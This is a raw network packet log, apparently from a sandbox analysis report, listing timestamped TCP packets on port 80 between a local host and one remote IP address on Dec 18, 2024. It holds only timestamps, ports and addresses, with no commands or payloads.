                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.802222013 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.803463936 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.822419882 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.822737932 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.822797060 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.823988914 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.824229002 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.824285030 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.827552080 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.827821016 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.827904940 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.830333948 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.830423117 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.830502987 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.832587957 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.832703114 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.832756042 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.835242033 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.835403919 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.835458994 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.838026047 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.838177919 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.838223934 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.840697050 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.840853930 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.840981007 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.843657970 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.843790054 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.843832970 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.846040010 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.846158981 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.846210003 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.848853111 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.848953962 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.849009037 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.851474047 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.851588011 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.851641893 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.854136944 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.854235888 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.854317904 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.857495070 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.857656956 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.858169079 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.859574080 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.859679937 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.859726906 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.861577034 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.861742973 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.861788988 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.864018917 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.864156961 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.864217043 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.866524935 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.866684914 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.866735935 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.869107962 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.869195938 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.869246960 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.871520996 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.871644020 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.871840000 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.874296904 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.874447107 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.874500036 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.876539946 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.876655102 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.876714945 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.879143953 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.879259109 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.879373074 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.881664038 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.881791115 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.881858110 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.884474993 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.884572983 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.884619951 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.886727095 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.886889935 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.886945963 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.889013052 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.889272928 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.889322996 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.891489029 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.891649008 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.891696930 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.894124031 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.894437075 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.894490004 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.896677017 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.896800995 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.896904945 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.899060965 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.899171114 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.899221897 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.901520967 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.901631117 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.901685953 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.904485941 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.904500008 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.904588938 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.907535076 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.907633066 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.907788038 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.909657955 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.909799099 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.909847975 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.911503077 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.911627054 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.911708117 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.914016962 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.914150953 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.914201975 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.916578054 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.916718006 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.916939974 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.919224024 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.919565916 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.919615030 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.921705961 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.921859026 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.921962023 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.923986912 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.924140930 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.924223900 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.926497936 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.926640034 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.926685095 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.929008961 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.929135084 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.929189920 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.931586027 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.931699038 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.931890011 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.934021950 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.934262991 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.934376001 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.936536074 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.936636925 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.936697960 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.939071894 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.939151049 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.939196110 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.941673040 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.941833019 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.941886902 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.944048882 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.944401026 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.944458008 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.946660042 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.946778059 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.946897030 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.949017048 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.949139118 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.949347019 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.014672041 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.014940977 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.015002966 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.015558958 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.015712023 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.015768051 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.017525911 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.017615080 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.017752886 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.019733906 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.019876957 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.020992041 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.021368027 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.021541119 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.021601915 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.023299932 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.023425102 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.023469925 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.025254011 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.025381088 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.025433064 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.026992083 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.027184963 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.027235031 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.035099030 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.035140991 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.035674095 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.035737991 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.036269903 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.036319017 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.036614895 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.037810087 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.037854910 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.037884951 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.039014101 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.039122105 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.039151907 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.040743113 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.040823936 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.040887117 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.042504072 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.042617083 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.042679071 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.044118881 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.044168949 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.044287920 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.045794964 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.045860052 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.045922041 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.047544956 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.047601938 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.047646999 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.049103022 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.049176931 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.049231052 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.050728083 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.050893068 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.050947905 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.052361012 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.052474976 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.052537918 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.053467989 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.053519011 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.053599119 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.054534912 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.054594040 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.054682016 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.055665970 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.055722952 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.055747032 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.057051897 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.057065964 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.057106018 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.057852030 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.057902098 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.058024883 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.058759928 CET44349805150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.058836937 CET49805443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.061403036 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.061465979 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.061913013 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.061925888 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.061940908 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.061979055 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.062786102 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.062800884 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.062833071 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.063229084 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.063241959 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.063271046 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.063786983 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.063800097 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.063843012 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.064591885 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.064605951 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.064635992 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.064785957 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.064799070 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.064836025 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.065592051 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.065637112 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.065857887 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.066706896 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.066891909 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.066945076 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.067847013 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.067905903 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.067996979 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.068888903 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.068942070 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.068999052 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.069827080 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.069981098 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.070030928 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.070758104 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.070801020 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.070946932 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.071717978 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.071773052 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.071834087 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.072567940 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.072699070 CET8049802139.99.188.124192.168.2.6
